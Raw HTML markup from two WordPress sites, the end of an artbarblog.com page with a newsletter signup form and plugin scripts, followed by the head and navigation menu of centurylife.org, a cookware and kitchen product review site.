invalid&quot;,&quot;passwordmismatch&quot;:&quot;Password mismatch error&quot;,&quot;required&quot;:&quot;Required field missing&quot;}"> <div class="thrv_lead_generation_container tve_clearfix"> <form action="#" method="post" novalidate="novalidate"> <div class="tve_lead_generated_inputs_container tve_clearfix tve_empty_dropzone"> <div class="tve_lg_input_container tve_lg_input" data-css="tve-u-1600c340219"> <input type="text" data-field="name" name="name" placeholder="Your Name" data-placeholder="Your Name" style="" data-required="0" data-validation="" class=""> </div> <div class="tve_lg_input_container tve_lg_input" data-css="tve-u-1600c34021b"> <input type="email" data-field="email" data-required="1" data-validation="email" name="email" placeholder="Email" data-placeholder="Email" class=""> </div> <div class="tve_lg_input_container tve_submit_container tve_lg_submit" data-css="tve-u-1600c31f72c" data-tcb_hover_state_parent=""> <button type="submit" class="tve-froala" style="">JOIN NOW!</button> </div> </div> <input id="_submit_option" type="hidden" name="_submit_option" value="message"><input id="__tcb_lg_msg" type="hidden" name="__tcb_lg_msg" value="YToyOntzOjU6ImVycm9yIjtzOjY6IkVycm9yISI7czo3OiJzdWNjZXNzIjtzOjM3OiJUaGFuayB5b3UgZm9yIGpvaW5pbmcgb3VyIG5ld3NsZXR0ZXIhIjt9"><input type="hidden" name="__tcb_lg_fc" id="__tcb_lg_fc" value="YToxOntzOjc6Im1hZG1pbWkiO3M6MTk6IkFCQiBTdWJzY3JpYmVyIExpc3QiO30="></form> </div> </div></div></div></div></div></div> </div></div></div><span id="dpsp-post-content-markup" data-image-pin-it="false"></span><div class="tcb_flag" style="display: none"></div> <span class="et_bloom_bottom_trigger"></span></article></div><a href="javascript:void(0)" class="tve_p_lb_close" style="" title="Close">x</a></div></div><link rel='stylesheet' id='et-gf-roboto-css' href='https://fonts.googleapis.com/css?family=Roboto:400,100,100italic,300,300italic,400italic,500,500italic,700,700italic,900,900italic&#038;subset=latin,cyrillic-ext,latin-ext,cyrillic,greek-ext,greek,vietnamese' type='text/css' media='all' /> <link rel='stylesheet' id='et-gf-open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.artbarblog.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var sb_instagram_js_options = {"sb_instagram_at":"","font_method":"svg"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/instagram-feed/js/sb-instagram.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var tve_frontend_options = {"is_editor_page":"","page_events":[],"is_single":"1","ajaxurl":"https:\/\/www.artbarblog.com\/wp-admin\/admin-ajax.php","social_fb_app_id":"","dash_url":"https:\/\/www.artbarblog.com\/wp-content\/plugins\/thrive-visual-editor\/thrive-dashboard","translations":{"Copy":"Copy"}}; var tve_frontend_options = {"ajaxurl":"https:\/\/www.artbarblog.com\/wp-admin\/admin-ajax.php","is_editor_page":"","page_events":[],"is_single":"1","social_fb_app_id":"","dash_url":"https:\/\/www.artbarblog.com\/wp-content\/plugins\/thrive-visual-editor\/thrive-dashboard","translations":{"Copy":"Copy"},"post_id":"15673"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/frontend.min.js'></script> <script type='text/javascript' src='//www.artbarblog.com/wp-content/plugins/thrive-leads/js/frontend.min.js'></script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/www.artbarblog.com\/cart\/","is_cart":"","cart_redirect_after_add":"yes"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js'></script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_a641433ef5e0e32ae8dda122e853771f","fragment_name":"wc_fragments_a641433ef5e0e32ae8dda122e853771f","request_timeout":"5000"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js'></script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/yith-woocommerce-ajax-search/assets/js/yith-autocomplete.min.js'></script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/themes/genesis/lib/js/skip-links.min.js'></script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/themes/foodie-pro/assets/js/general.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var tve_dash_front = {"ajaxurl":"https:\/\/www.artbarblog.com\/wp-admin\/admin-ajax.php","force_ajax_send":"1","is_crawler":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/thrive-visual-editor/thrive-dashboard/js/dist/frontend.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var MadMimi = {"thankyou":"Thank you for signing up!","thankyou_suppressed":"Thank you for signing up! Please check your email to confirm your subscription.","oops":"Oops! There was a problem. Please try again.","fix":"There was a problem. Please fill all required fields."}; /* ]]> */ </script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/mad-mimi-sign-up-forms/js/mimi.min.js'></script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/bloom/core/admin/js/common.js'></script> <script type='text/javascript' src='https://www.artbarblog.com/wp-includes/js/wp-embed.min.js'></script> <script type="text/javascript">/*<![CDATA[*/if ( !window.TL_Const ) {var TL_Const={"security":"2a582f4c8f","ajax_url":"https:\/\/www.artbarblog.com\/wp-admin\/admin-ajax.php","forms":{"ribbon":{"_key":"1","trigger":"page_load","trigger_config":{},"form_type_id":15749,"main_group_id":15748,"active_test_id":""}},"action_conversion":"tve_leads_ajax_conversion","action_impression":"tve_leads_ajax_impression","ajax_load":0,"main_group_id":15748,"display_options":{"allowed_post_types":[],"flag_url_match":null},"custom_post_data":{"http_referrer":"http:\/\/artbarblog.com"},"current_screen":{"screen_type":1,"screen_id":0},"ignored_fields":["email","_captcha_size","_captcha_theme","_captcha_type","_submit_option","_use_captcha","g-recaptcha-response","__tcb_lg_fc","__tcb_lg_msg","_state","_form_type","_error_message_option","_back_url","_submit_option","url","_asset_group","_asset_option","mailchimp_optin"]};} else {ThriveGlobal.$j.extend(true, TL_Const, {"security":"2a582f4c8f","ajax_url":"https:\/\/www.artbarblog.com\/wp-admin\/admin-ajax.php","forms":{"ribbon":{"_key":"1","trigger":"page_load","trigger_config":{},"form_type_id":15749,"main_group_id":15748,"active_test_id":""}},"action_conversion":"tve_leads_ajax_conversion","action_impression":"tve_leads_ajax_impression","ajax_load":0,"main_group_id":15748,"display_options":{"allowed_post_types":[],"flag_url_match":null},"custom_post_data":{"http_referrer":"http:\/\/artbarblog.com"},"current_screen":{"screen_type":1,"screen_id":0},"ignored_fields":["email","_captcha_size","_captcha_theme","_captcha_type","_submit_option","_use_captcha","g-recaptcha-response","__tcb_lg_fc","__tcb_lg_msg","_state","_form_type","_error_message_option","_back_url","_submit_option","url","_asset_group","_asset_option","mailchimp_optin"]})} /*]]> */</script><script type="text/javascript">var TL_Front = TL_Front || {}; TL_Front.impressions_data = TL_Front.impressions_data || {};TL_Front.impressions_data.ribbon = {"group_id":15748,"form_type_id":15749,"variation_key":"1","active_test_id":0,"output_js":true};</script><script type="text/javascript"> (function ($) { $(function () { var event_data = {"form_id":"tve-leads-track-ribbon-1","form_type":"ribbon"}; event_data.source = 'page_load'; setTimeout(function () { ThriveGlobal.$j(TL_Front).trigger('showform.thriveleads', event_data); }, 200); }); }) (ThriveGlobal.$j); </script></body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Object Caching 39/200 objects using redis Page Caching using redis Served from: www.artbarblog.com @ 2019-05-16 10:57:23 by W3 Total Cache -->
0
<!DOCTYPE html> <html lang="en-US"> <head itemscope itemtype="https://schema.org/WebSite"> <meta charset="UTF-8" /> <meta name="keywords" content="houseware, kitchenware, cookware, health, nutrition, cooking, longevity, knives, thermometers, steamers, pressure cookers, recipes, reviews, product reviews, stainless, clad" /> <meta name="robots" content="noarchive,noodp,noydir" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>CenturyLife.Org</title> <link rel='dns-prefetch' href='//netdna.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="CenturyLife.Org &raquo; Feed" href="https://www.centurylife.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="CenturyLife.Org &raquo; Comments Feed" href="https://www.centurylife.org/comments/feed/" /> <link rel="canonical" href="https://www.centurylife.org/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.centurylife.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='agentpress-pro-theme-css' href='https://www.centurylife.org/wp-content/themes/agentpress-pro/style.css?ver=3.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://www.centurylife.org/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_stylesheet-css' href='https://www.centurylife.org/wp-content/plugins/captcha/css/front_end_style.css?ver=4.4.5' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://www.centurylife.org/wp-includes/css/dashicons.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_desktop_style-css' href='https://www.centurylife.org/wp-content/plugins/captcha/css/desktop_style.css?ver=4.4.5' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='//netdna.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.css' type='text/css' media='screen' /> <link rel='stylesheet' id='google-fonts-css' href='//fonts.googleapis.com/css?family=Lato%3A300%2C700%7CRoboto%3A700%2C300%2C400&#038;ver=3.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='simple-social-icons-font-css' href='https://www.centurylife.org/wp-content/plugins/simple-social-icons/css/style.css?ver=3.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='tablepress-default-css' href='https://www.centurylife.org/wp-content/plugins/tablepress/css/default.min.css?ver=1.9.2' type='text/css' media='all' /> <link rel='stylesheet' id='mc4wp-form-basic-css' href='https://www.centurylife.org/wp-content/plugins/mailchimp-for-wp/assets/css/form-basic.min.css?ver=4.5.2' type='text/css' media='all' /> <link rel='stylesheet' id='an_style-css' href='https://www.centurylife.org/wp-content/uploads/UFUAsqAKKUIp/osargYlzqKir.css?ver=2.2.3' type='text/css' media='all' /> <style id='an_style-inline-css' type='text/css'> /* an_style.css AdBlock Notify Copyright: (c) 2016 Themeisle, themeisle.com Version: 2.1.0*/.QAiMaFcrBOkW-bg { display: none; position: fixed; z-index: 100; top: 0; left: 0; width: 100%; height: 100%; background: #000; background: rgba(0,0,0,0.75);}.QAiMaFcrBOkW { visibility: hidden; position: fixed; z-index: 101; top: 100px; right: 0; left: 0; max-width: 640px; margin-right: auto; margin-left: auto; background: #fff; -webkit-box-shadow: 0 3px 5px 2px rgba(0,0,0,0.25); box-shadow: 0 3px 5px 2px rgba(0,0,0,0.25); font-family: Arial, Helvetica, sans-serif;}.QAiMaFcrBOkW-default,.QAiMaFcrBOkW-ok { padding: 30px 30px 15px;}.QAiMaFcrBOkW-image { overflow: hidden; position: relative; width: 100%;}.QAiMaFcrBOkW-image .QAiMaFcrBOkW-left { position: absolute; top: 0; left: 0; width: 50%; height: 100%;}.QAiMaFcrBOkW-image .QAiMaFcrBOkW-right { float: right; width: 50%; padding: 30px;}.QAiMaFcrBOkW.small { width: 200px; margin-left: -140px;}.QAiMaFcrBOkW.medium { width: 400px; margin-left: -240px;}.QAiMaFcrBOkW.large { width: 600px; margin-left: -340px;}.QAiMaFcrBOkW.xlarge { width: 800px; margin-left: -440px;}.close-QAiMaFcrBOkW { display: inline-block; position: absolute; top: 15px; right: 15px; width: 30px; height: 30px; color: #bbb; font-size: 32px; font-weight: 700; line-height: 30px; text-align: center; cursor: pointer; -webkit-transition: 0.3s; transition: 0.3s;}.close-QAiMaFcrBOkW:hover { color: #252b37;}.QAiMaFcrBOkW h1 { margin-bottom: 15px; padding: 0 30px; color: #252b37; font-size: 28px; line-height: 1.25; text-align: center;}.QAiMaFcrBOkW-right h1 { padding: 0 30px 0 0; text-align: left;}.QAiMaFcrBOkW p { margin-bottom: 15px; color: #333745; font-size: 14px;}.QAiMaFcrBOkW p a { color: #ff6160;}.QAiMaFcrBOkW-right .close-modal,.QAiMaFcrBOkW-footer .close-modal { padding: 15px !important; border-radius: 0 !important; background-color: #ff6160; font-size: 14px; letter-spacing: 2px !important; -webkit-transition: 0.3s; transition: 0.3s;}.QAiMaFcrBOkW-right .close-modal:hover,.QAiMaFcrBOkW-footer .close-modal:hover { background-color: #252b37 !important;}.QAiMaFcrBOkW-footer .grey-button-modal { margin-right: 15px; background-color: #a5a5a5;}.QAiMaFcrBOkW-footer { display: block; padding: 15px 30px; background-color: #eff4f7; text-align: right;}@media only screen and (max-width: 640px) { .QAiMaFcrBOkW { right: 5%; left: 5%; max-width: 90%; } .QAiMaFcrBOkW-default { padding: 20px; } .QAiMaFcrBOkW-image .QAiMaFcrBOkW-left { width: 100%; height: 250px; } .QAiMaFcrBOkW-image .QAiMaFcrBOkW-right { float: left; width: 100%; margin-top: 250px; padding: 20px; } .QAiMaFcrBOkW h1 { margin-bottom: 10px; font-size: 20px; } .QAiMaFcrBOkW-right h1 { padding: 0; } .QAiMaFcrBOkW p { margin-bottom: 10px; } .close-QAiMaFcrBOkW { color: #fcfcfc; background-color: #252b37; } .close-QAiMaFcrBOkW:hover { color: #252b37; background-color: #fcfcfc; } .QAiMaFcrBOkW-footer { padding: 15px 20px; }}@media only screen and (max-width: 480px) { .QAiMaFcrBOkW-image .QAiMaFcrBOkW-left { height: 200px; } .QAiMaFcrBOkW-image .QAiMaFcrBOkW-right { margin-top: 200px; } .QAiMaFcrBOkW-footer { text-align: center; } .QAiMaFcrBOkW-footer .close-modal { width: 80%; margin: 5px 10%; }} </style> <script>!(function(o,n,t){t=o.createElement(n),o=o.getElementsByTagName(n)[0],t.async=1,t.src="https://steadfastsystem.com/v2/0/taksQPxdJTxPAUgu9v1Q7QoQXwXBZ7KIaYabUwHRjp949D8HODGF3EYTKvSZMVWpSubKnJuC6cd9PF9-f7aaCiFMA0lvhlPiWXw9KBiUEXcgHj3wNbtuCcgMR2JyKf5iwYQF-xNrQ",o.parentNode.insertBefore(t,o)})(document,"script"),(function(o,n){o[n]=o[n]||function(){(o[n].q=o[n].q||[]).push(arguments)}})(window,"admiral");!(function(n,e,r,t){function o(){if((function o(t){try{return(t=localStorage.getItem("v4ac1eiZr0"))&&0<t.split(",")[4]}catch(n){}return!1})()){var t=n[e].pubads();typeof t.setTargeting===r&&t.setTargeting("admiral-engaged","true")}}(t=n[e]=n[e]||{}).cmd=t.cmd||[],typeof t.pubads===r?o():typeof t.cmd.unshift===r?t.cmd.unshift(o):t.cmd.push(o)})(window,"googletag","function");;;;;</script><script type='text/javascript' src='https://www.centurylife.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.centurylife.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.centurylife.org/wp-content/plugins/fd-footnotes/fdfootnotes.js?ver=1.34'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://www.centurylife.org/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript' src='https://www.centurylife.org/wp-content/themes/agentpress-pro/js/responsive-menu.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.centurylife.org/wp-content/plugins/simple-social-icons/svgxuse.js?ver=1.1.21'></script> <link rel='https://api.w.org/' href='https://www.centurylife.org/wp-json/' /> <!-- Graceful Pull-Quotes plugin v2.6.1 --> <link rel="stylesheet" href="https://www.centurylife.org/wp-content/plugins/graceful-pull-quotes/resources/jspullquotes-core.css" type="text/css" /> <link rel="stylesheet" href="https://www.centurylife.org/wp-content/plugins/graceful-pull-quotes/styles/Modern.css" type="text/css" /> <script type="text/javascript"> var jspq_options = new Array("1", "1", "left", "", "1", "aside", "pullquote", "pullquote pqRight"); </script> <script type="text/javascript" src="https://www.centurylife.org/wp-content/plugins/graceful-pull-quotes/resources/jspullquotes.js"></script> <!-- end pull-quote additions --> <style> .scroll-back-to-top-wrapper { position: fixed; opacity: 0; visibility: hidden; overflow: hidden; text-align: center; z-index: 99999999; background-color: #777777; color: #eeeeee; width: 50px; height: 48px; line-height: 48px; right: 30px; bottom: 30px; padding-top: 2px; border-top-left-radius: 10px; border-top-right-radius: 10px; border-bottom-right-radius: 10px; border-bottom-left-radius: 10px; -webkit-transition: all 0.5s ease-in-out; -moz-transition: all 0.5s ease-in-out; -ms-transition: all 0.5s ease-in-out; -o-transition: all 0.5s ease-in-out; transition: all 0.5s ease-in-out; } .scroll-back-to-top-wrapper:hover { background-color: #888888; color: #eeeeee; } .scroll-back-to-top-wrapper.show { visibility:visible; cursor:pointer; opacity: 1.0; } .scroll-back-to-top-wrapper i.fa { line-height: inherit; } .scroll-back-to-top-wrapper .fa-lg { vertical-align: 0; } </style><link rel="icon" href="https://www.centurylife.org/wp-content/themes/agentpress-pro/images/favicon.ico" /> <link rel="next" href="https://www.centurylife.org/page/2/" /> <meta itemprop="name" content="CenturyLife.Org" /> <meta itemprop="url" content="https://www.centurylife.org/" /> </head> <body class="home blog sidebar-content agentpress-pro-blue" itemscope itemtype="https://schema.org/WebPage"><div class="site-container"><nav class="nav-primary" aria-label="Main" itemscope itemtype="https://schema.org/SiteNavigationElement"><div class="wrap"><ul id="menu-2016menubar" class="menu genesis-nav-menu menu-primary"><li id="menu-item-9357" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9357"><a href="https://www.centurylife.org/category/kitchen/" itemprop="url"><span itemprop="name">Kitchen</span></a> <ul class="sub-menu"> <li id="menu-item-9346" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-9346"><a href="https://www.centurylife.org/how-to-choose-cookware/" itemprop="url"><span itemprop="name">How to Choose Cookware</span></a> <ul class="sub-menu"> <li id="menu-item-9400" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9400"><a href="https://www.centurylife.org/a-no-nonsense-guide-to-cookware-materials/" itemprop="url"><span itemprop="name">A No-Nonsense Guide to Cookware Materials</span></a></li> <li id="menu-item-9396" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9396"><a href="https://www.centurylife.org/cladded-sidewalls-vs-disc-bottomed-cookware-which-is-better/" itemprop="url"><span itemprop="name">Cladded sidewalls vs. disc-bottomed cookware</span></a></li> <li id="menu-item-9393" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9393"><a href="https://www.centurylife.org/how-thick-is-insert-brand-cookware-how-thick-is-the-base-how-thick-is-the-clad-layer-where-was-it-made-is-it-induction-compatible-and-how-long-is-the-warranty/" itemprop="url"><span itemprop="name">Cookware Thickness Database</span></a></li> <li id="menu-item-9404" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9404"><a href="https://www.centurylife.org/cookware-even-heating-rankings-butane-propane-natural-gas-etc/" itemprop="url"><span itemprop="name">Thermal Rankings: Gas</span></a></li> <li id="menu-item-9405" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9405"><a href="https://www.centurylife.org/cookware-even-heating-rankings-induction-and-electric/" itemprop="url"><span itemprop="name">Thermal Rankings: Electric and Induction</span></a></li> <li id="menu-item-9373" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9373"><a href="https://www.centurylife.org/heat-retention-myths-and-facts-does-cast-iron-hold-heat-better-than-clad-is-clad-better-than-disc-base-at-retaining-heat-longer/" itemprop="url"><span itemprop="name">Heat retention myths and facts</span></a></li> <li id="menu-item-9394" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9394"><a href="https://www.centurylife.org/how-to-choose-an-enameled-dutch-oven-is-le-creuset-worth-it-is-staub-worth-it-why-does-it-cost-so-much-what-are-my-alternatives-are-chinese-made-ovens-safe-can-i-use-bare-cast-iron-instead-how/" itemprop="url"><span itemprop="name">How to choose an enameled Dutch oven (Le Creuset, Staub, Lodge, etc.)</span></a></li> <li id="menu-item-9403" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9403"><a href="https://www.centurylife.org/glass-vs-solid-stainless-steel-metal-lids-which-are-better-what-about-universal-lids/" itemprop="url"><span itemprop="name">Lids: Glass vs Stainless vs Universal</span></a></li> <li id="menu-item-9402" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9402"><a href="https://www.centurylife.org/rivets-vs-welds-should-i-buy-cookware-with-riveted-handles-or-welded-handles-what-about-screwed-on-handles/" itemprop="url"><span itemprop="name">Handles: Rivets vs Welds vs Screw-On</span></a></li> <li id="menu-item-9395" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9395"><a href="https://www.centurylife.org/what-is-the-difference-between-tri-ply-and-5-ply-and-7-ply-how-many-plies-do-i-need/" itemprop="url"><span itemprop="name">What&#8217;s the difference between 3-ply (tri-ply) and 5-ply and 7-ply?</span></a></li> </ul> </li> <li id="menu-item-9376" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9376"><a href="https://www.centurylife.org/how-to-choose-a-knife-in-depth-product-reviews-kitchen-knives-sharpeners-knife-blocks-and-other-knife-storage/" itemprop="url"><span itemprop="name">How to Choose a Knife: In-Depth Product Reviews: Kitchen Knives, Sharpeners, Knife Blocks, and Other Knife Storage</span></a></li> <li id="menu-item-9716" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9716"><a href="https://www.centurylife.org/how-to-organize-pots-and-pans-and-dishes-cutting-boards-and-lids-with-racks-and-shelving/" itemprop="url"><span itemprop="name">How to organize pots and pans (and dishes, cutting boards, and lids) with racks and shelving</span></a></li> <li id="menu-item-9362" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9362"><a href="https://www.centurylife.org/the-best-blender-vitamix-vs-blendtec/" itemprop="url"><span itemprop="name">High-Powered Blenders: An In-Depth Review of Vitamix vs. Blendtec vs. Oster vs. Also-Rans</span></a></li> <li id="menu-item-9347" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9347"><a href="https://www.centurylife.org/how-to-choose-cookware/how-to-choose-a-steamer-for-steaming-vegetables-fish-meatballs-and-more/" itemprop="url"><span itemprop="name">How to Choose Steamer and Pasta Inserts</span></a></li> <li id="menu-item-9379" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9379"><a href="https://www.centurylife.org/garlic-anti-cancer-and-cardiovascular-health-benefits/" itemprop="url"><span itemprop="name">Garlic Presses</span></a></li> <li id="menu-item-9349" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9349"><a href="https://www.centurylife.org/how-to-choose-a-cooktop/how-to-choose-a-portable-induction-cooker-countertop-burner/" itemprop="url"><span itemprop="name">Induction Stoves</span></a></li> <li id="menu-item-9342" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-9342"><a href="https://www.centurylife.org/how-to-choose-sous-vide-equipment-what-is-sous-vide-what-equipment-do-i-need-for-sous-vide-an-introduction-to-sous-vide/" itemprop="url"><span itemprop="name">How to Choose Sous Vide Equipment</span></a> <ul class="sub-menu"> <li id="menu-item-9375" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9375"><a href="https://www.centurylife.org/in-depth-product-review-anova-precision-cooker-an-immersion-circulator-for-sous-vide-cooking-with-bluetooth/" itemprop="url"><span itemprop="name">In-Depth Product Review: ANOVA Precision Cooker (an Immersion Circulator for Sous Vide Cooking</span></a></li> <li id="menu-item-9374" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9374"><a href="https://www.centurylife.org/does-pot-material-matter-for-sous-vide-cooking/" itemprop="url"><span itemprop="name">Does pot material matter for sous vide cooking?</span></a></li> </ul> </li> <li id="menu-item-9348" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9348"><a href="https://www.centurylife.org/how-to-choose-a-cooktop/" itemprop="url"><span itemprop="name">How To Choose a Cooktop</span></a></li> <li id="menu-item-11180" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-11180"><a href="https://www.centurylife.org/in-depth-product-reviews-silicone-spatulas-turners-and-scrapers-comparison/" itemprop="url"><span itemprop="name">In-Depth Product Reviews: Silicone Spatulas, Turners, and Scrapers Comparison</span></a></li> </ul> </li> <li id="menu-item-9354" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9354"><a href="https://www.centurylife.org/category/home/" itemprop="url"><span itemprop="name">Home</span></a> <ul class="sub-menu"> <li id="menu-item-9410" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9410"><a href="https://www.centurylife.org/a-post-plastic-home-known-and-unknown-dangers-of-plastic-and-alternatives-to-plastic-food-storage-shower-curtains-water-bottles-and-other-household-products/" itemprop="url"><span itemprop="name">A Post-Plastic Home: Known and Unknown Dangers of Plastic, and Alternatives</span></a></li> <li id="menu-item-9355" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9355"><a href="https://www.centurylife.org/in-depth-product-review-megahome-countertop-water-distiller-glass-collection-white-enamel-or-stainless-steel-finish/" itemprop="url"><span itemprop="name">Affordable Water Distillation</span></a></li> <li id="menu-item-10115" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-10115"><a href="https://www.centurylife.org/category/home/sleep/" itemprop="url"><span itemprop="name">Sleep</span></a> <ul class="sub-menu"> <li id="menu-item-9370" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9370"><a href="https://www.centurylife.org/blue-light-special-how-to-get-more-sleep-in-one-easy-step/" itemprop="url"><span itemprop="name">Blue Light Special: How to get more sleep in one easy step</span></a></li> <li id="menu-item-10112" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-10112"><a href="https://www.centurylife.org/in-depth-product-review-white-noise-generators-aka-sound-generators-sound-machines-marpac-sleepmatesound-screen-580a-980a-dohm-ss-dohm-ds-and-alternative-sleep-aids/" itemprop="url"><span itemprop="name">In-Depth Product Review: White Noise Generators as Sleep Aids</span></a></li> </ul> </li> </ul> </li> <li id="menu-item-9364" class="menu-item 